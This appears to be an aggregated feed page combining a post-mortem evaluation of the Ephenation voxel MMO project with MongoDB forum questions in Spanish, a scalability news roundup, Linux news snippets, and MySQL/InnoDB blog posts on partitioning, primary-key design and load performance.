Ephenation evaluation report        

Vision of Ephenation

To have a game like World Of Warcraft, where players are able to add their own adventures. I think this is a probable future development. This type of games should be fully realized and generally available in something like 10 to 20 years.

Goals

Unlimited world

The size of the world should not be limited. It is easier to implement a flat world than a spherical world, and a flat world can be unlimited. The nature will obviously have to be created automatically.

Unlimited players

This is not possible, of course, but the number of simultaneous players should be big. Limitation to 10 or 100 is much too small, as everyone would more or less know everyone and work on the same project. A minimum would be 1000 players, but preferably more than 10000. That will lead into a situation where you always meet new players you don't know, and the world is big enough so as to always find somewhere that you have not explored.

Unlimited levels

Most RPG type of games have a limited set of levels. But that will put a limit on the game play. After reaching the top level, the game is no longer the same. Not only that, but there is a kind of a race to reach this top level. Instead, there shall be no last top level. That will put an emphasis on constant exploration and progress.

Allocate territory

Players should be able to allocate a territory, where they can design their own adventures. This territory shall be protected from others, making sure no one else can interfere with the design.

Social support

The community and social interaction is very important. That is one reason for the requirement to support many players, as it will allow you to include all friends. There are a couple of ways to encourage community:
  1. Use of guilds. This would be a larger group of players, where you know the others.
  2. Temporary teams, used when exploring. It is more fun to explore with others.
  3. Use of common territories. It shall be possible to cooperate with friends to make territories that are related and possibly adjacent to each other.

Mechanics

It shall be possible to design interesting buildings, landscapes and adventures. The adventures shall be advanced enough so as to support triggered actions, with dynamic behavior that depends on player choices.

Execution

This is a description on how the project was executed. It was started end of 2010. Most of the programming was done by me (Lars Pensjö), but I got support with several sub modules.

Server

It was decided to use Go as the programming language for the server. Go has just the right support for this type of software:
  1. High performance (compiled language)
  2. Object oriented and static typing
  3. A concept of gorutines (light version of threads)
  4. A very high quotient for "it works when it compiles"
  5. Garbage collection
The disadvantage of Go when the Ephenation project was started, was that Go was a new language, in transition, with uncertain future. This turned out to not be a problem, and the language has today a frozen specification (Go 1).

To be able to manage the massive amount of players, quadtrees are used for both players and monsters.

It is the server that has full control over all Model data. Player attributes, melee mechanisms, movements, etc.

Client

The client was initially designed in C, but I soon switched to C++. There are still some remains from C, which explains some not-so-good OO solutions. OpenGL was selected, instead of DirectX, partly as a random choice, but also because I wanted to do the development in Linux.

It was decided to use OpenGL 3.3, instead of supporting older variants. There are some nice improvements in OpenGL that makes design easier, which was deemed more important than supporting old hardware.

The world consists of blocks, voxels. This is difficult to draw in real time with high FPS, as the number of faces grow very quickly with viewing distance. Considerable effort was spent on transforming the list of cubes into a list of visible triangles. It is also difficult to make a level of detail (LOD) algorithm that gradually reduce details on long distances.

Another technical difficult with a world based on cubes was to make it look nice, instead of blocky. Some algorithms were investigated that used a kind of filter. As the view distance is limited, there can be a conflict when being underground.

The game engine can't know whether the far distance, which is not visible, should be replaced by a light background (from the sky) or from a dark background (typical to being underground). A compromise is used, where the color of the distance fog depends on the player being at a certain height.

Protocol

There are strict requirements on the protocol. If a server shall be able to handle 10000+ players, the communication can easily become a bottleneck. TCP/IP was selected in favor of UDP/IP, to make it easier to handle traffic control. The protocol itself is not based on any standard, and completely customized for Ephenation.

Mechanics

There are two major choices. Either use a scripting language to control the aspects of the world, or a graphical approach. A scripting language is more powerful, but on the other hand it is harder to learn. There is also the problem with supporting a massive amount of players, in which case time consuming scripts would make it unfeasible.

The choice was to go for a limited set of blocks, with a special block type that can be used to initiate predefined actions. Inspiration was taken from the principles of Lego blocks. With a relatively small set of basic blocks, it is possible to construct the most amazing things.

Evaluation

Game engine

The client side was designed from scratch, instead of using an existing game engine. This may have been a mistake, as the main development time was spent on graphical technology, instead of exploring the basic visions.

Adventure design and mechanics

The set of blocks and possible actions with "activator blocks" are currently limited. It is not enough to construct full adventures that are fun to explore and provides great entertainment.
Early version of the game, where a player abused the monster spawner

Game play

The basic world is automatically generated. This usually make a game of limited interest, as game play is bound to become repetitive. Support from initial players enabled the creation of a world with many new buildings and creations. The more advanced features that support dynamic behavior was not added until later, which unfortunately lead to most part of the current world being too static.

Graphics

The graphics is working, but far from a production level. There are several glitches, e.g. camera falling inside the wall and lighting effects cut off. As the world is dynamic, the possibility to do offline precalculations are limited. That means most graphical effects has to be done live, which is a difficult requirement. For example, it is not known how many light sources that should be possible to manage. It was chosen to use a deferred shader, which improves the decoupling from geometry and shading.
Early attempt to create automatic monsters. This was later replaced with fully animated models.

Social

The social side of the game play has been explored very limited. There are ways to send message to nearby players, and to communicate privately with any player. Although this is a very important aspect of the final vision, it is known technology and not difficult to implement.

Performance tests

The aggressive requirement to support 10,000 simultaneous players is hard to verify. A simple simulator was used, adding 1000 players at random position with a uniform density. These players simply walked around. If they were attacked, they attacked back again. If they were killed, they automatically used the command to revive again.

On a Core I7 with 8 GBytes of RAM, the load from the server was approximately 10%. This is no proof that the server can actually manage 10,000 players, as there may be non linear dependencies. There are known bottlenecks, for example monster management that is currently handled by a single thread. That means at most one core can be used for this, but it should be possible to distribute this task into several smaller goroutines.

The communication was measured at around 100 MB/s. With linear scaling, it would be 1GB/s for 10,000 players. The intention is that the scaling should be linear, as cross communication between players is designed to be of constant volume. Still, it remains to be proven.

There is the obvious question whether the simulator is representative to real players. One way to improve that assessment would be to measure the actual behaviour of real players, and compare with the simulator.

Another possible bottle neck is the communication with the player database (MongoDB). This depends on the number of login/logout and auto saves. It also depends on load generated from the web page. This has not been evaluated. Typically, an access takes about 1ms. The MongoDB is currently located on the same system as the game server, minimizing communication latency. The database will have to be managed by another computer system for a full production server.

Equipment

The objects that the player can wear and wield are simplified. As the game as a concept is unlimited, it is not possible to hand craft objects. Instead, there are 4 defined qualities for each object, per level.

Communication

TCP/IP has a higher overhead than UDP/IP. Some packages are big (the complete chunks), which would have required several UDP/IP packets and a complicated transmission control. It may be that UDP/IP should be used instead. However, this was not an issue for evaluation of the project.

As the server is responsible for all object atributes, the clients need to be updated frequently. Player and monster positions are updated 10 times per second. This generates some data, so the update is limited to nearby players. Because of this, the client need to do interpolation to be able to show smooth movements, and the client need to be able to manage stale information about other players and monsters. The advantage of having the server manage all attributes is that it is not possible to cheat. The client source code is available, and it would have been easy to do changes.

Conclusion

Moore's law

I believe the computers will continue to grow more powerful exponentially for many years still. However, the full power will probably not be accessible unless the game server can scale well with increasing number of cores. The performance test were done on hardware from 2011, and there are already much more powerful equipment available.

Adventure design

As a proof of concept, I think the project was successful. The thing I miss most, is a powerful enough mechanism that supports custom adventures. This is a key point of the game concept, but I believe, with more personnel involved, that new ideas would be available that would improve the possibilities considerably.

Document update history

2013-02-22 First published.
2013-02-24 Added discussion about using voxels on the client side.
2013-02-27 Information about entity attribute management and communication.
2015-05-04 Pictures failed, and were replaced.

          _id With Mongoose        
Let us take a very common use-case: “There will be a registration page for users, where users will provide their required details along with their picture”. Details would be saved to MongoDB while the pictures would be uploaded to Cloudinary or S3 with user unique id.” Suppose we have User Schema as given below: We […]
          Error 0x80070005 Bash Ubuntu en Windows 10        

La solución a este error es muy sencilla. Ir a la carpeta donde están los archivos del bash: %localappdata%\lxss Eliminar el contenido de la carpeta Eso es todo. Este error puede persistir después de des-instalar y reinstalar el sub-sistema, incluso, después Continuar leyendo

La entrada Error 0x80070005 Bash Ubuntu en Windows 10 se publicó primero en Juarbo.


          Red Hat Enterprise Linux gets cozy with MongoDB        
Easing the path for organizations to launch big data-styled services, Red Hat has coupled the 10gen MongoDB data store to its new identity management package for the Red Hat Enterprise Linux (RHEL) distribution.
          10gen expands MongoDB with storage service        
Open source database provider 10gen is expanding into storage services, offering a hosted backup service for its flagship MongoDB data store.
          MongoDB refines load balancing        
Following the tradition set by recent versions, the new release of the MongoDB NoSQL data store comes with a batch of new features designed to appeal to the enterprise market, including a new built-in search engine, more support for geospatial data and the ability to balance workloads across multiple servers more effectively.
          MongoDB competes on speed and flexibility        
While debate rages on over the value of nonrelational, or NoSQL, databases, two case studies presented at a New York conference this week point to the benefits of using the MongoDB non-SQL data store instead of a standard relational database.
          Internet databases MongoDB, Drizzle upgraded        
Two performance-minded databases created for supporting Internet services and cloud computing have been revised: MongoDB has been updated and Drizzle has reached its first production-ready release.
          mongoArray        

mongoArray

Respuesta a mongoArray

Prueba con:

db.usuario.update( {nombre:'erwis'}, { $addToSet:{seguridad:[{pregunta:'¿mascota favorita?',respuesta:'chichi'}]} }, {upsert:true} ); MongoDB Enterprise > db.usuario.find().count(); 0
MongoDB Enterprise > db.usuario.update( {nombre:'erwis'}, { $addToSet:{seguridad:{pregunta:'¿mascota favorita?',respuesta:'chichi'}} }, {upsert:true} ); WriteResult({ "nMatched" : 0, "nUpserted...

Publicado el 16 de Junio del 2017 por Andrés

          mongoArray        

mongoArray

Buenos días estoy empezando con mongoDb . (nota: la colecion , array y documento se asemeja al real solo que lo coloque de forma sencilla) tengo un problema vease primero el ejemplo de la collection que tengo:
db.usuario.insert({"id":"123","nombre":"erwis" seguridad:[{"pregunta":"'¿mascota favorita?","respuesta":"chichi",}] });
yo necesito validar que un usuario no...

Publicado el 12 de Junio del 2017 por Erwis

          Where field not array        

Where field not array

Hola,
Haver si me pueden ayudar, no suelo trabajar con MongoDB así que voy un poco perdido, lo que necesito lo indico claramente en el titulo. Necesito obtener todos los documentos que un field concreto no sea de tipo array, he visto $type y BSON types (array) pero no me devuelve los resultados que quiero.. es mas me dice (Robomongo) Script executed successfully, but there are no results to show.
Ejemplo con array en "otros"."otro"
Publicado el 16 de Febrero del 2017 por oriol anton

          Duda en mongodb con consulta usando operaciones aritmeticas        

Duda en mongodb con consulta usando operaciones aritmeticas

Respuesta a Duda en mongodb con consulta usando operaciones aritmeticas

Hola,

Sé que tiene mucho tiempo este hilo de conversación abierto, pero buscando algo sobre mongo, encontré este traductor de consultas sql en consulta para mongodb.

[url]

Pongo la liga para que no se me olvide y en algún momento no muy lejano me pueda servir.


Saludos
José Luis

Publicado el 14 de Febrero del 2017 por José Luis

          geotiff en mongodb?        

geotiff en mongodb?

Hola lista

Necesito saber su opinión sobre si es posible almacenar archivos geoTiff (o sea, imagenes georeferenciadas) en MongoDB. Y ademas, de ser esto posible, cual es el tamaño máximo de archivo a almacenar que MondoDB soporta en el casi de este tipo de archivos.

Saludos

Publicado el 07 de Febrero del 2017 por Pablo

          Insert de forma masiva        

Insert de forma masiva

Respuesta a Insert de forma masiva

Hola,

Existen 2 comandos en mongodb para importar y exportar.


mongoexport

y

mongoimport

ademas de otros comandos.

mongo mongoexport mongooplog mongos
mongod mongofiles mongoperf mongostat
mongodump mongoimport mongorestore mongotop


Saludos
José Luis

Publicado el 01 de Diciembre del 2016 por José Luis

          Consulta basica MongoDB        

Consulta basica MongoDB

Hola, estoy intentando aprender MongoDB y me surgen algunas preguntas puntuales.

Entiendo que MongoDB esta diseñado para una escalabilidad horizontal por lo que las relaciones entre colecciones no son lo que se espera, pero me surgio la siguiente pregunta.
Yo tengo la coleccion alumnos con sus cursos:


{ nombre: "Azure", cursos: [ { nombre:"Matematica", codigo:"M001&...

Publicado el 28 de Octubre del 2016 por Zangles

          Bloquear Autenticación anónima mongodb        

Bloquear Autenticación anónima mongodb

Buenos días,
tengo configurado el mongodb para poder ingresar solo con usuario y password.
Esta es mi configuración:
setParameter:
enableLocalhostAuthBypass: false
security:
authorization: enabled


Si ingreso el comando "mongo" sin parámetros de usuario y password me devuelve:
# mongo
MongoDB shell version: 3.2.8
connecting to: test

> show collections
...

Publicado el 27 de Septiembre del 2016 por Dennis

          Duda en mongodb con consulta usando operaciones aritmeticas        

Duda en mongodb con consulta usando operaciones aritmeticas

Respuesta a Duda en mongodb con consulta usando operaciones aritmeticas

la consulta que quiero expresar en mongoDB es esta:

SELECT ra,dec from db WHERE valor_absoluto(ra-ra0)<tamaño/2 && valor_absoluto(dec-dec0)<tamaño/2

Publicado el 11 de Agosto del 2016 por William

          Duda en mongodb con consulta usando operaciones aritmeticas        

Duda en mongodb con consulta usando operaciones aritmeticas

Buen día.

Tengo una duda que me surgió de repente porque creo que no había tenido la oportunidad de hacer una consulta así pero me tocó y no tengo idea de como hacerla o no se si se pueda hacer.

Lo que intento hacer es una consulta en mongodb sencilla pero que incluya operaciones aritméticas, me explico:

valor_absoluto(ra-ra0)<tamaño/2 && valor_absoluto(dec-dec0)<tamaño/2

En donde: ra0, dec0 y tamaño son valores de entrada...

Publicado el 10 de Agosto del 2016 por William

          Alguien tendra un ejemplo de como hacer una consulta en dos collectiones.??        

Alguien tendra un ejemplo de como hacer una consulta en dos collectiones.??

Respuesta a Alguien tendra un ejemplo de como hacer una consulta en dos collectiones.??

A partir de mongodb 3.2, tienes el operador $lookup, que vincula las colecciones
[url]

Publicado el 29 de Julio del 2016 por xve

          Stuff The Internet Says On Scalability For July 14th, 2017        

Hey, it's HighScalability time:

 

 

We've seen algorithms expressed in seeds. Here's an algorithm for taking birth control pills expressed as packaging. Awesome history on 99% Invisible.

If you like this sort of Stuff then please support me on Patreon.

 

  • 2 trillion: web requests served daily by Akamai; 9 billion: farthest star ever seen in light-years; 10^31: bacteriophages on earth; 7: peers needed to repair ransomware damage; $30,000: threshold of when to leave AWS; $300K-$400K: beginning cost of running Azure Stack on HPE ProLiant; 3.5M: files in the Microsoft's git repository; 300M: Google's internal image data training set size; 7.2 Mbps: global average connection speed; 85 million: Amazon Prime members; 35%: Germany generated its electricity from renewables;

  • Quotable Quotes:
    • Jessica Flack: I believe that science sits at the intersection of these three things — the data, the discussions and the math. It is that triangulation — that’s what science is. And true understanding, if there is such a thing, comes only when we can do the translation between these three ways of representing the world.
    • gonchs: “If your whole business relies on us [Medium], you might want to pick a different one”
    • @AaronBBrown777: Hey @kelseyhightower, if you're surfing GitHub today, you might find it interesting that all your web bits come thru Kubernetes as of today.
    • Psyblog: The researchers were surprised to find that a more rebellious childhood nature was associated with a higher adult income.
    • Antoine de Saint-Exupéry: If you want to build a ship, don't drum up people to collect wood and don't assign them tasks and work, but rather teach them to long for the endless immensity of the sea.
    • Marek Kirejczyk: In general I would say: if you need to debug — you’ve already lost your way.
    • jasondc: To put it another way, RethinkDB did extremely well on Hacker News. Twitter didn't, if you remember all the negative posts (and still went public). There is little relation between success on Hacker News and company success.
    • Rory Sutherland: What intrigues me about human decision making is that there seems to be a path-dependence involved - to which we are completely blind.
    • joeblau: That experience taught me that you really need to understand what you're trying to solve before picking a database. Mongo is great for some things and terrible for others. Knowing what I know now, I would have probably chosen Kafka.
    • 0xbear: cloud "cores" are actually hyperthreads. Cloud GPUs are single dies on multi-die card. If you use GPUs 24x7, just buy a few 1080 Ti cards and forego the cloud entirely. If you must use TF in cloud with CPU, compile it yourself with AVX2 and FMA support. Stock TF is compiled for the lowest common denominator
    • Dissolving the Fermi Paradox: Doing a distribution model shows that even existing literature allows for a substantial probability of very little life, and a more cautious prior gives a significant probability for rare life
    • Peter Stark: Crews with clique structures report significantly more depression, anxiety, anger, fatigue and confusion than crews with core-periphery structures.
    • Patrick Marshall: Gu said that the team expects to have a prototype [S2OS’s software-defined hypervisor is being designed to centrally manage networking, storage and computing resources] ready in about three years that will be available as open-source software.
    • cobookman: I've been amazed that more people don't make use of googles preemtibles. Not only are they great for background batch compute. You can also use them for cutting your stateless webserver compute costs down. I've seen some people use k8s with a cluster of preemtibles and non preemtibles. 
    • @jeffsussna: Complex systems can’t be fully modeled. Failure becomes the only way to fully discover requirements. Thus the need to embrace it.
    • Jennifer Doudna: a genome’s size is not an accurate predictor of an organism’s complexity; the human genome is roughly the same length as a mouse or frog genome, about ten times smaller than the salamander genome, and more than one hundred times smaller than some plant genomes.
    • Daniel C. Dennett: In Darwin’s Dangerous Idea (1995), I argued that natural selection is an algorithmic process, a collection of sorting algorithms that are themselves composed of generate-and-test algorithms that exploit randomness (pseudo-randomness, chaos) in the generation phase, and some sort of mindless quality-control testing phase, with the winners advancing in the tournament by having more offspring.
    • Almir Mustafic: My team learned the DynamoDB limitations before we went to production and we spent time calculating things to properly provision RCUs and WCUs. We are running fine in production now and I hear that there will be automatic DynamoDB scaling soon. In the meantime, we have a custom Python script that scales our DynamoDB.

  • I've written a novella: The Strange Trial of Ciri: The First Sentient AI. It explores the idea of how a sentient AI might arise as ripped from the headlines deep learning techniques are applied to large social networks. I try to be realistic with the technology. There's some hand waving, but I stay true to the programmers perspective on things. One of the big philosophical questions is how do you even know when an AI is sentient? What does sentience mean? So there's a trial to settle the matter. Maybe. The big question: would an AI accept the verdict of a human trial? Or would it fight for its life? When an AI becomes sentient what would it want to do with its life? Those are the tensions in the story. I consider it hard scifi, but if you like LitRPG there's a dash of that thrown in as well. Anyway, I like the story. If you do too please consider giving it a review on Amazon. Thanks for your support!

  • Serving 39 Million Requests for $370/Month, or: How We Reduced Our Hosting Costs by Two Orders of Magnitude. Step 1: Just Go Serverless: Simply moving to a serverless environment had the single greatest impact on reducing hosting costs. Our extremely expensive operating costs immediately shrunk by two orders of magnitude. Step 2: Lower Your Memory Allocation: Remember, each time you halve your function’s memory allocation, you’re roughly halving your Lambda costs. Step 3: Cache Your API Gateway Responses: We pay around $14 a month for a 0.5GB API Gateway cache with a 1 hour TTL. In the last month, 52% (20.3MM out of 39MM) of our API requests were served from the cache, meaning less than half (18.7MM requests) required invoking our Lambda function. That $14 saves us around $240 a month in Lambda costs.

Don't miss all that the Internet has to say on Scalability, click below and become eventually consistent with all scalability knowledge (which means this post has many more items to read so please keep on reading)...


          today's leftovers        
  • Linux Weather Forecast

    This page is an attempt to track ongoing developments in the Linux development community that have a good chance of appearing in a mainline kernel and/or major distributions sometime in the near future. Your "chief meteorologist" is Jonathan Corbet, Executive Editor at LWN.net. If you have suggestions on improving the forecast (and particularly if you have a project or patchset that you think should be tracked), please add your comments below.

  • Linux guru Linus Torvalds is reviewing gadgets on Google+

    Now it appears the godfather of Linux has started to put all that bile to good use by reviewing products on Google+.

  • Learning to love Ansible

    I’ve been convinced about the merits of configuration management for machines for a while now; I remember conversations about producing an appropriate set of recipes to reproduce our haphazard development environment reliably over 4 years ago. That never really got dealt with before I left, and as managing systems hasn’t been part of my day job since then I never got around to doing more than working my way through the Puppet Learning VM. I do, however, continue to run a number of different Linux machines - a few VMs, a hosted dedicated server and a few physical machines at home and my parents’. In particular I have a VM which handles my parents’ email, and I thought that was a good candidate for trying to properly manage. It’s backed up, but it would be nice to be able to redeploy that setup easily if I wanted to move provider, or do hosting for other domains in their own VMs.

  • GSoC: Improvements in kiskadee architecture

    Today I have released kiskadee 0.2.2. This minor release brings some architecture improvements, fix some bugs in the plugins and improve the log messages format. Initially, lets take a look in the kiskadee architecture implemented on the 0.2 release.

  • How UndoDB works

    In the previous post I described what UndoDB is, now I will describe how the technology works.

    The naïve approach to record the execution of a program is to record everything that happens, that is the effects of every single machine instruction. This is what gdb does to offer reversible debugging.

  • Wild West RPG West of Loathing Launches for PC/Mac/Linux on August 10th

    Today, developer Asymmetric announced that its comedy, wild west RPG, West of Loathing, is poised to launch for PC, Mac, and Linux on August 10th.

  • Canonical asks users' help in deciding Ubuntu Linux desktop apps

    Canonical Ubuntu Linux has long been one of the most popular Linux desktop distributions. Now, its leadership is looking to its users for help to decide the default desktop applications in the next long-term support version of the operating system: Ubuntu 18.04.

    This release, scheduled for April 2018, follows October's Ubuntu 17.10, Artful Aardvark. Ubuntu 18.04 will already include several major changes. The biggest of these is Ubuntu is abandoning its Unity 8 interface to go back to the GNOME 3.x desktop.

  • Enhanced Open Source Framework Available for Parallel Programming on Embedded Multicore Devices
  • Studiolada used all wood materials to create this affordable open-source home anyone can build

    Using wood panels as the principal building material reduced the project’s overall cost and footprint because the wooden beams and wall panels were cut and varnished in a nearby workshop. Prefabricated concrete was used to embed the support beams, which were then clad in wooden panels. In fact, wood covers just about everything in the home, from the walls and flooring to the ceiling and partitions. Sustainable materials such as cellulose wadding and wood fibers were even used to insulate the home.


          Comment on InnoDB per-table tablespaces – file for each innodb table by Team Roster        
Best you should change the post title InnoDB per-table tablespaces – file for each innodb table | Lamp, scalability, opensource to more catching for your subject you create. I loved the post however.
          Comment on InnoDB per-table tablespaces – file for each innodb table by bpelhos        
And add innodb_file_per_table to my.cnf file, of course.
          Comment on InnoDB per-table tablespaces – file for each innodb table by bpelhos        
It works when you: * drop the foreign keys of the InnoDB tables * alter the InnoDB tables to MyISAM * stop mysql server * remove/move the ibdata* and ib_logfile* files * start mysql server (it should appear a new ibdata1 file with 10M filesize) * alter the previously altered tables back to InnoDB * create the foreign keys removed at the first step
          Comment on InnoDB per-table tablespaces – file for each innodb table by Ranjeet Walunj        
@abul : yeah .. but why do u want to delete ibdata1 after step 3 and 4 ? Step 1 and 2 will help you regain space ... step 3 and 4 will help you optimize tables and have separate innodb files for them
          Comment on InnoDB per-table tablespaces – file for each innodb table by Abul Hassan        
Good Post. Thanks for the information. My question is, what will happen if we delete ibdata1 file after we do step 3 and 4? Could we regain the space again?
          Comment on InnoDB per-table tablespaces – file for each innodb table by Kelly Brown        
Hi, gr8 post thanks for posting. Information is useful!
          The case for a new open-source relational database        
I've been thinking about a new open-source relational database for a while, and here's my thoughts as to why the world needs one, even though PostgreSQL and MySQL would seem to have a lock, with SQLite doing well in small devices.

First, some strengths and weaknesses of each:

1. PostgreSQL is very good at query optimization, and has a large and powerful set of query answering facilities. Where it isn't so wonderful is its storage engine, where the old "versioned" storage manager, complete with its vacuum cleaner - which sucked in 1990 when I worked on it and is still a operational PITA - still resides. It "works", and is serviceable for many applications (particularly large archival apps, where deletes and updates are done rarely or never), but is a huge problem for always-up OLTP apps.

2. OTOH, MySQL has the opposite problem: its parser and executor are lame (gee, will they ever figure out how to cache constant subquery results? How about hashjoins? Type checking? Not defaulting to friggin case-insensitive Swedish as the default collation?), but its open storage architecture allows lots of interesting storage engines, and InnoDB's index-organized structure kicks butt if you know how to use it. We use MySQL/InnoDB for a very large, SaaS database ourselves with both heavy OLTP components and heavy archival search components. To get around its sucky top-level, I have to carefully police all significant queries, make extensive use of optimizer hints, and work with developers to make certain they aren't doing something problematic like using a subquery that is always treated as correlated, etc.

In a dream-world, I could figure out a way to hook up PostgreSQL's top level with the InnoDB storage engine. That would be a powerful relational engine.

That said, there are things neither engine, and no relational db engine in the open-source world that I'm aware of, do very well:

1. Better handling of in-memory tables and in-memory indexes. One thing I did that was very popular in DeviceSQL was an efficient in-memory hashed and ordered index on a persistent table. It is very popular with customers and was extremely fast.
2. Fast bootup, even after ungraceful shutdown. Given that Serious Databases increasingly exist on small, portable devices, fast bootup is needed. Fast bootup has all sorts of implications for transaction handling, so it has to be "designed in" from the beginning.
3. An open storage architecture is a must, both for base storage and for indexes (and the open-storage architecture should allow index-organized base storage as well).
4. "Vector" index query answering facilities. One of the biggest limitations on relational database execution engines today is the inability to use multiple indexes on the same table. A "vector index strategy" would allow large tables to be searched by multiple parameters without needing to "pick a winner" (and often there isn't any good choices to pick...)

More later...
          MySQL, Postgres, and InnoDB: Some Critiques of Index Organized Tables        
This discussion of InnoDB versus Postgres' storage engine (and index organized table structures generally, as this could also apply to Oracle's IOT's) is worth a careful read. Since our schema makes heavy use of the index organized property of InnoDB - and since I have a bit of a fanboy wish to use Postgres as I worked on it for a few years versus helping to buy Larry another yacht - here's some discussion of where index organized structures add value and some criticisms of my own.

Even though one used a primary key definition to define the "index organization structure", in my opinion, the real power of index organized table structures is in larger, "bulk" searches over single-record lookups of the sort one would typically do with a primary key. Assuming very careful schema design and querying, the advantage with "bulk" searches is that a single B-tree ingress is all that is necessary to answer the search, while secondary indexes require at least some indirection into the table, which gets expensive if the working set involves millions of records (as it often does, at least in our case). See the below discussion on telemetry schemas for more.

Index Organized Table Wishlist

  1. Have an explicit "ORGANIZATION KEY" table declaration (or some such) and not rely on the PRIMARY KEY. If the organization key doesn't completely define the storage, allow "..." or something to allow for an incompletely defined organization key. If "ORGANIZATION KEY" is omitted, default to the PRIMARY KEY.
  2. Secondary indexes should have the option of using storage row-ids to "point at" the main rows as organization keys can be relatively long, and require walking two different B-trees to find the recs. Implementing this could be hard and make inserts slow as otherwise unchanged rows can "move around" while the B-tree is having stuff done to it - requiring secondary indexes to have pointers redone - so there's a design trade-off here. In our environment, we mostly avoid secondary indexes in favor of "search tables", which are basically user-managed indexes.
If I get the energy to do an open-source project, I want to do what I call "vector indexes" and a "vectoring execution engine" that we've basically implemented in user code in our app. If we had "vector indexes", we wouldn't be so reliant on index-organized table structures.
          Partition pruning and WHERE clauses        
If you're using lots of partitions, you'll want to make sure that partition pruning is used, and you aren't always guaranteed that it will be. We had a situation where we have a set of very large (potentially >1B rows, currently ~250M rows) tables that are partitioned on "Unix days" (Unix time rounded to days), that have several hundred partitions, using "hash" partitioning to simplify maintenance. So, to simplify, our table looks something like

create table mytable (id integer, unix_day mediumint, primary key (id, unix_day**)) engine=innodb partition by hash (unix_day) partitions 500;

Let's load up a with 1B records. Assuming even distribution, we'll have 2M records in each partition. Now, let's run the following query, to fetch everything in the past 3 days (ignoring timezones for simplicity):

set @today = unix_timestamp(now()) div 86400;

select id from mytable
where unix_day >= @today - 3;


Since we're using "hash" partitioning, this will end up being a monster table scan on the entire table, taking hours to complete. The problem is this query can't be "pruned" because "hash" partitioning doesn't have an implied order.

However, if we run this query

select id from mytable where unix_day in (@today-3, @today - 2, @today - 1, @today);

we'll get good pruning and only four partitions will be searched. Note that MySQL is also good at exploding small integer ranges (ie, ranges less than the number of partitions) into what amounts to an IN-list for partition pruning purposes, so the above query, which is difficult to code in an app, can be converted to

select id from mytable where unix_day between @today - 3 and @today;

and only four partitions will be searched.

**Note that this "stupid" PRIMARY KEY declaration is necessary to have InnoDB let us use unix_day as a partition key, as partition keys must be part of an existing key (primary or otherwise). Making it a separate KEY - and additional index - would be hugely expensive and unnecessary in our app.
          InnoDB versus MyISAM: large load performance        
The conventional wisdom regarding InnoDB versus MyISAM is that InnoDB is faster in some contexts, but MyISAM is generally faster, particularly in large loads. However, we ran an experiment in which a large bulk load of a mysqldump output file, which is basically plain SQL consisting of some CREATE TABLE and CREATE INDEX statements, and a whole lot of huge INSERT statements, in which InnoDB was the clear winner over MyISAM.

We have a medium-sized database that we have to load every month or so. When loaded, the database is about 6GB in MyISAM, and about 11G in InnoDB, and has a couple hundred million smallish records. The MySQL dump file itself is about 5.6G, and had "ENGINE=MyISAM" in its CREATE TABLE statements that we "sed" substituted to "ENGINE=InnoDB" to do the InnoDB test.

Load time with ENGINE=MyISAM: 203 minutes (3 hours 23 minutes)
Load time with ENGINE=InnoDB: 40 minutes

My guess is that the performance difference is due to the fact that these tables have lots of indexes. Every table has a PRIMARY KEY, and at least one secondary index. InnoDB is generally better at large index loads than MyISAM in our experience, so the extra time MyISAM spends doing index population swamps its advantage in simple load time to the base table storage.

Given our experimental results, we'll now use InnoDB for this table.
          INNODB: When do partitions improve performance?        
PARTITIONs are one of the least understood tools in the database design toolkit.

As an index-organized storage mechanism, InnoDB's partitioning scheme can be extremely helpful for both insert/load performance and read performance in queries that leverage the partition key.

In InnoDB, the best way to think of a partitioned table is as a hash table with separate B-trees in the individual partitions, with the individual B-trees structured around the PRIMARY KEY (as is always the case with InnoDB-managed tables). The partition key is the "bucketizer" for the hash table.

Since the main performance issue in loading data into an InnoDB table is the need to figure out where to put new records in an existing B-Tree structure, a partition scheme that allows new data to go into "new" partitions, with "short" B-trees, will dramatically speed up performance. Also, the slowest loads will be bounded by the maximum size of an individual partition.

A partition scheme I generally like to use is one with several hundred partitions, driven by "Unix days" (ie, Unix time divided by 86400 seconds). Since data is typically obsoleted or archived away after a couple of years, this will allow at most a couple of days of data in a partition.

The partition key needs to be explicitly used in the WHERE clauses of queries in order to take advantage of partition pruning. Note that even if you can figure out how to derive the partition key from other data in the WHERE clause, the query optimizer often can't (or at least isn't coded to do so), so it's better to explicitly include it in the WHERE clause by itself, ANDed with the rest of the WHERE.

Some notes on using MySQL partitions:

1. Secondary indexes won't typically go much faster. Shorter B-trees will help some, but not all that much, particularly since it's hard to do both partition pruning and use a secondary index against the same table in a single query.
2. In MySQL, don't create a secondary index on the partition key, as it will effectively "hide" the partition key from MySQL and result in worse performance than if the partition is directly used.
3. Partitions can't be easily "nested". While you can use a computed expression to map your partition in more recent versions of MySQL, it is difficult for MySQL to leverage one well for the purposes of partition pruning. So, keeping your partitions simple and just using them directly in queries is preferable.
4. If you use "Unix day" as a partition, you'll want to explicitly include it in a query, even if you already have a datetime value in the query and the table. This may make queries look slightly ugly and redundant, but they'll run a lot faster.
5. The biggest "win" in searching from partitioning will be searches on the PRIMARY KEY that also use the partition key, allowing for partition pruning. Also, searches that otherwise would result in a table scan can at least do a "short" table scan only in the partitions of interest if the partition key is used in the query.
          PRIMARY KEYs in INNODB: Choose wisely        
PRIMARY KEYs in InnoDB are the primary structure used to organize data in a table. This means the choice of the PRIMARY KEY has a direct impact on performance. And for big datasets, this performance choice can be enormous.

Consider a table with a primary search attribute such as "CITY", a secondary search attribute "RANK", and a third search attribute "DATE".

A simple "traditional" approach to this table would be something like

create table myinfo (city varchar(50),
rank float,
info_date timestamp,
id bigint,
primary key (id)
) engine=innodb;


create index lookup_index
on myinfo (city, rank, info_date);


InnoDB builds the primary table data store in a B-tree structure around "id", as it's the primary key. The index "index_lookup" contains index records for every record in the table, and the primary key of the record is stored as the "lookup key" for the index.

This may look OK at first glance, and will perform decently with up to a few million records. But consider how lookups on myinfo by a query like

select * from myinfo where city = 'San Jose' and rank between 5 and 10 and date > '2011-02-15';

are answered by MySQL:

1. First, the index B-tree is walked to find the records of interest in the index structure itself.
2. Now, for every record of interest, the entire "primary" B-tree is walked to fetch the actual record values.

This means that N+1 B-trees are walked for N result records.

Now consider the following change to the above table:

create table myinfo (city varchar(50),
rank float,
info_date timestamp,
id bigint,
primary key (city, rank, info_date, id)
) engine=innodb;

create index id_lookup on myinfo (id);

The primary key is now a four-column primary key, and since "id" is distinct, it satisfies the uniqueness requirements for primary keys. The above query now only has to walk a single B-tree to be completely answered. Note also that searches against CITY alone or CITY+RANK also benefit.

